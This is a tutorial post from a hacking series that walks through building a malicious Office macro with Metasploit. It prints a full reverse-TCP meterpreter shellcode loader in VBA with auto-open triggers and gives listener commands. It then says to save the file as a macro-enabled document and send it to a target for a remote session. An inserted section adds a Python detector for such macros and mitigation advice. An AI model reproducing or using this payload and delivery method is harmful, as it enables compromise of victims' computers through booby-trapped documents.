Whoop Whoop Wazzup Guys.
Today the 2nd part of my series.
The tool we're going to use today is ordinary Metasploit.
Hopefully you know what Metasploit is and how it works, so let's
start. Fire up the msfconsole with the command msfconsole. The only 3
things you need are the LHOST, LPORT and AutoRunScript. The commands
are the following:
use windows/meterpreter/reverse_tcp
set LPORT 443
set AutoRunScript post/windows/manage/smart_migrate
set LHOST 192.168.x.x
And let's generate it with the command: generate -t vba
You will get an output like this:
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Nmignwz As Long, ByVal Jtklbyzu As Long, ByVal Fbxq As LongPtr, Irctne As Long, ByVal Xtjlc As Long, Fflilwsof As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Uvitzp As Long, ByVal Khnfa As Long, ByVal Ofhmpeaxv As Long, ByVal Jupfwuvu As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Nma As LongPtr, ByRef Psupt As Any, ByVal Lykogxg As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Nmignwz As Long, ByVal Jtklbyzu As Long, ByVal Fbxq As Long, Irctne As Long, ByVal Xtjlc As Long, Fflilwsof As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Uvitzp As Long, ByVal Khnfa As Long, ByVal Ofhmpeaxv As Long, ByVal Jupfwuvu As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Nma As Long, ByRef Psupt As Any, ByVal Lykogxg As Long) As Long
#EndIf
Sub Auto_Open()
Dim Xtvamqt As Long, Oxaudsqp As Variant, Zpkjfe As Long
#If Vba7 Then
Dim Juqhahfmi As LongPtr, Xpdodpp As LongPtr
#Else
Dim Juqhahfmi As Long, Xpdodpp As Long
#EndIf
Oxaudsqp = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,1,16,104,2,0,1,187,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,106,0,106,4,86,87,104,2,217,200,95,255,213, _
139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147, _
83,106,0,86,83,87,104,2,217,200,95,255,213,1,195,41,198,117,238,195 _
)
Juqhahfmi = VirtualAlloc(0, UBound(Oxaudsqp), &H1000, &H40)
For Zpkjfe = LBound(Oxaudsqp) To UBound(Oxaudsqp)
Xtvamqt = Oxaudsqp(Zpkjfe)
Xpdodpp = RtlMoveMemory(Juqhahfmi + Zpkjfe, Xtvamqt, 1)
Next Zpkjfe
Xpdodpp = CreateThread(0, 0, Juqhahfmi, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
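The generated macro above has a very recognisable shape from the defender's side: an auto-exec entry point (Auto_Open/AutoOpen/Workbook_Open), kernel32 declarations for VirtualAlloc, RtlMoveMemory and CreateThread, a PAGE_EXECUTE_READWRITE (&H40) allocation, and a long numeric Array() literal. As an added example that is not part of the original post, here is a small static check in the spirit of oletools' olevba that scans VBA source text for exactly those indicators. The VBA samples inside it are constructed for the example (the byte array is a tiny inert placeholder, not a payload), and the function and constant names are my own.

```python
import re

# Constructed sample (not from the original post): a trimmed VBA macro that keeps
# the shape of Metasploit's "generate -t vba" output -- kernel32 declarations,
# an Auto_Open body that allocates RWX memory and starts a thread, and the
# AutoOpen/Workbook_Open wrappers -- with the byte array replaced by a tiny
# inert placeholder so the sample carries no payload.
SAMPLE_VBA = """#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As LongPtr, D As Long, ByVal E As Long, F As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As Long, ByVal D As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal A As LongPtr, ByRef B As Any, ByVal C As Long) As LongPtr
#End If
Sub Auto_Open()
Dim Buf As Variant, P As LongPtr, I As Long
Buf = Array(144,144, _
144,195)
P = VirtualAlloc(0, UBound(Buf), &H1000, &H40)
For I = LBound(Buf) To UBound(Buf)
RtlMoveMemory P + I, Buf(I), 1
Next I
CreateThread 0, 0, P, 0, 0, 0
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
"""

# Constructed benign macro for comparison: no auto-exec name, no Win32 declarations.
BENIGN_VBA = """Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
"""

# Constructed edge case: a large numeric array but no loader APIs and no auto-exec
# name, which should come back as "suspicious" rather than "malicious".
ARRAY_ONLY_VBA = "Sub Helper()\nDim B As Variant\nB = Array(" + ",".join(["0"] * 80) + ")\nEnd Sub\n"

# Procedure names Office runs automatically when a document/workbook opens or closes.
AUTOEXEC_NAMES = {"auto_open", "autoopen", "workbook_open", "document_open",
                  "auto_close", "autoclose", "document_close", "autoexec"}
# Win32 APIs that, declared together in a macro, form the classic in-process
# shellcode loader (allocate -> copy bytes -> run them on a new thread).
LOADER_APIS = {"virtualalloc", "rtlmovememory", "createthread"}

DECLARE_RE = re.compile(r'\bdeclare\s+(?:ptrsafe\s+)?(?:function|sub)\s+(\w+)\s+lib\s+"([^"]+)"', re.I)
SUB_RE = re.compile(r'^\s*(?:public\s+|private\s+)?sub\s+(\w+)', re.I | re.M)
ARRAY_RE = re.compile(r'\barray\s*\(([\d,\s_]+)\)', re.I)
RWX_RE = re.compile(r'&H40\b', re.I)  # PAGE_EXECUTE_READWRITE as passed to VirtualAlloc


def analyze_macro(src):
    """Return the indicators found in VBA source text and a coarse verdict."""
    declared = {name.lower(): lib.lower() for name, lib in DECLARE_RE.findall(src)}
    subs = {name.lower() for name in SUB_RE.findall(src)}
    indicators = []

    autoexec = sorted(subs & AUTOEXEC_NAMES)
    if autoexec:
        indicators.append("auto-exec entry point: " + ", ".join(autoexec))

    loader = sorted(api for api in declared if api in LOADER_APIS)
    if loader:
        indicators.append("Win32 loader API declared: " + ", ".join(loader))

    if "virtualalloc" in declared and RWX_RE.search(src):
        indicators.append("VirtualAlloc with PAGE_EXECUTE_READWRITE (&H40)")

    # Size of the largest numeric Array() literal; a shellcode stub is dozens to
    # hundreds of bytes, so anything this long deserves a look.
    largest = max((len(re.findall(r"\d+", body)) for body in ARRAY_RE.findall(src)), default=0)
    if largest >= 64:
        indicators.append(f"numeric Array() literal with {largest} elements (shellcode-sized)")

    if autoexec and len(loader) == 3:
        verdict = "malicious: auto-executing shellcode loader"
    elif loader or largest >= 64:
        verdict = "suspicious: review manually"
    else:
        verdict = "no loader indicators"
    return {"verdict": verdict, "indicators": indicators, "declared_apis": declared}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA), ("array-only", ARRAY_ONLY_VBA)):
        report = analyze_macro(src)
        print(f"{label}: {report['verdict']}")
        for line in report["indicators"]:
            print("  -", line)
```

In practice you would pull the VBA source out of the .docm or .doc with olevba (or another OLE/OOXML parser) and feed that text to analyze_macro; the check is deliberately keyed on the declaration/auto-exec pattern rather than on the byte values, so renaming the variables, as Metasploit already does, does not help the macro. The mitigation that actually removes the risk is policy, not signatures: blocking macros in files that carry the Mark of the Web and disabling unsigned macros via Group Policy means the Auto_Open entry point never runs.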
Okay cool now start a listener by using:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 443
exploit
And switch to a Windows box and open Microsoft Word or Microsoft Excel. Go to the 'View' tab, select the Macros button
and then View Macros.
Add a new macro (just give it the name you want) and press Create.
(You can do all these steps in one, just hit Alt+F11.)
Remove the things your document creates by default and paste the generated macro code into the editor. Then close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled Document) or WhateverYouWant.doc (must be a Word 97-2003 Document!)
Press save and send your file to your target. Switch back to the system you're running your Metasploit listener on.
And bam we got a session once again :)
I think I'm going to upload the next part tomorrow, so see ya then guys.
Goodbye
@ClaimItToYou